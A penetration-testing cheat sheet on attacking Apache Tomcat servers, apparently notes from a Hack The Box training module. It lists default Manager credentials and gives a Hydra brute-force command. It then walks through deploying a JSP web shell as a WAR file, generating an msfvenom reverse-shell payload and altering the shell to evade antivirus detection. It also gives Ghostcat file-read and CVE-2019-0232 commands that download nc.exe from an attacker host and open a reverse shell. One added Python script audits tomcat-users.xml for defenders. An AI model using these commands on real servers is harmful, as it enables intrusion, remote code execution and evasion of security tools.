# Tomcat

#### General folder structure of a Tomcat installation

```bash
├── bin
├── conf
│   ├── catalina.policy
│   ├── catalina.properties
│   ├── context.xml
│   ├── tomcat-users.xml
│   ├── tomcat-users.xsd
│   └── web.xml
├── lib
├── logs
├── temp
├── webapps
│   ├── manager
│   │   ├── images
│   │   ├── META-INF
│   │   └── WEB-INF
│   │       └── web.xml
│   └── ROOT
│       └── WEB-INF
└── work
    └── Catalina
        └── localhost
```

The `bin` folder stores scripts and binaries needed to start and run a Tomcat server.

The `conf` folder stores various configuration files used by Tomcat.

The `tomcat-users.xml` file stores user credentials and their assigned roles.

The `lib` folder holds the various JAR files needed for the correct functioning of Tomcat. The `logs` and `temp` folders store temporary log files.

The `webapps` folder is the default webroot of Tomcat and hosts all the applications.

The `work` folder acts as a cache and is used to store data during runtime.

Each folder inside `webapps` is expected to have the following structure.

```bash
webapps/customapp
├── images
├── index.jsp
├── META-INF
│   └── context.xml
├── status.xsd
└── WEB-INF
    ├── jsp
    │   └── admin.jsp
    ├── web.xml
    ├── lib
    │   └── jdbc_drivers.jar
    └── classes
        └── AdminServlet.class
```

The most important file among these is `WEB-INF/web.xml`, which stores information about the routes used by the application and the classes handling these routes. Any vulnerability in these files can lead to total compromise of the website.

{% hint style="info" %}
[Jakarta Server Pages (JSP)](https://en.wikipedia.org/wiki/Jakarta_Server_Pages), formerly known as `JavaServer Pages`, can be compared to PHP files on an Apache server.
{% endhint %}

## **Discovery/Footprinting**

{% hint style="info" %}
The `web.xml` descriptor holds a lot of sensitive information and is an important file to check when leveraging a Local File Inclusion (LFI) vulnerability.
{% endhint %}

#### Tomcat Version

![https://academy.hackthebox.com/storage/modules/113/tomcat\_invalid.png](https://academy.hackthebox.com/storage/modules/113/tomcat_invalid.png)

```bash
#Get tomcat version
Intrusionz3r0@htb[/htb]$ curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat 
```

#### **Default Credentials**

The **`/manager/html`** directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being:

* admin:admin
* tomcat:tomcat
* admin:
* admin:s3cr3t
* tomcat:s3cr3t
* admin:tomcat
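A defender's counterpart to the list above, added here as an example (not code from the original page): it parses a `conf/tomcat-users.xml` and flags accounts that use one of these default credential pairs, have an empty password, or hold a role that grants access to the Manager or Host Manager application. The sample XML is constructed for the example.

```python
"""Audit a Tomcat tomcat-users.xml for default Manager credentials and
over-privileged accounts (added example; the sample XML is constructed)."""
import xml.etree.ElementTree as ET

# The default username:password pairs listed in the section above.
DEFAULT_CREDS = {
    ("admin", "admin"), ("tomcat", "tomcat"), ("admin", ""),
    ("admin", "s3cr3t"), ("tomcat", "s3cr3t"), ("admin", "tomcat"),
}
# Roles that grant access to /manager/html (WAR deployment) or the host manager.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# Constructed sample of conf/tomcat-users.xml, not taken from a real install.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cr3t" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Zx9!longRandomValue" roles="manager-script"/>
  <user username="reader" password="" roles="manager-status"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text):
    """Return (username, finding) tuples for weak or risky accounts."""
    findings = []
    root = ET.fromstring(xml_text)
    # The file may or may not declare the Tomcat namespace; match on local name.
    for user in root.iter():
        if user.tag.split("}")[-1] != "user":
            continue
        # Older files use the attribute "name" instead of "username".
        name = user.get("username") or user.get("name") or ""
        pwd = user.get("password") or ""
        roles = {r.strip() for r in (user.get("roles") or "").split(",") if r.strip()}
        if (name, pwd) in DEFAULT_CREDS:
            findings.append((name, "default credential pair"))
        if pwd == "":
            findings.append((name, "empty password"))
        risky = roles & PRIVILEGED_ROLES
        if risky:
            findings.append((name, "manager/admin role: " + ",".join(sorted(risky))))
    return findings


if __name__ == "__main__":
    for username, finding in audit_tomcat_users(SAMPLE_XML):
        print(f"{username}: {finding}")
```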

**Wordlist**:

* `/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt`
* `/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt`

```bash
#Brute force attack (-L takes the user list; the combined userpass file is for -C)
Intrusionz3r0@htb[/htb]$ hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt -f web01.inlanefreight.local http-get /manager/html
```

**Bruteforce Script**

<https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce>

## **Tomcat Manager - WAR File Upload**

```bash
Intrusionz3r0@htb[/htb]$ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
Intrusionz3r0@htb[/htb]$ zip -r backup.war cmd.jsp 
#After uploading backup.war through /manager/html, the web shell is reachable under the WAR's name
Intrusionz3r0@htb[/htb]$ curl -s 'http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=ls'
```

Alternatively, MSFVenom can be used to create the `.war` file. (The `cmd.jsp` web shell as-is is detected by only 2/58 anti-virus vendors.)

```bash
Intrusionz3r0@htb[/htb]$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war
```

A simple change, such as changing:

```java
FileOutputStream(f);stream.write(m);o="Uploaded:
```

to:

```java
FileOutputStream(f);stream.write(m);o="uPlOaDeD:
```

results in 0/58 security vendors flagging the `cmd.jsp` file as malicious at the time of writing.

### **CVE-2020-1938 : Ghostcat**

All Tomcat versions before 9.0.31, 8.5.51, and 7.0.100 were found vulnerable.

<https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi>

```bash
Intrusionz3r0@htb[/htb]$ python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml 
```

## **Apache Tomcat: Important: Remote Code Execution on Windows (CVE-2019-0232)**

#### Affected versions

* 9.0.0.M1 to 9.0.17
* 8.5.0 to 8.5.39
* 7.0.0 to 7.0.93

```bash
#Find .bat files served through the CGI servlet
Intrusionz3r0@htb[/htb]$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.129.47.188:8080/cgi/FUZZ.bat -t 300 -ic
Intrusionz3r0@htb[/htb]$ curl 'http://10.129.132.157:8080/cgi/cmd.bat?&c%3a\Windows\System32\certutil.exe+-urlcache+-split+-f+http%3a//10.10.14.33/nc.exe'
Intrusionz3r0@htb[/htb]$ curl 'http://10.129.132.157:8080/cgi/cmd.bat?&nc.exe+-e+cmd.exe+10.10.14.33+1234'
```
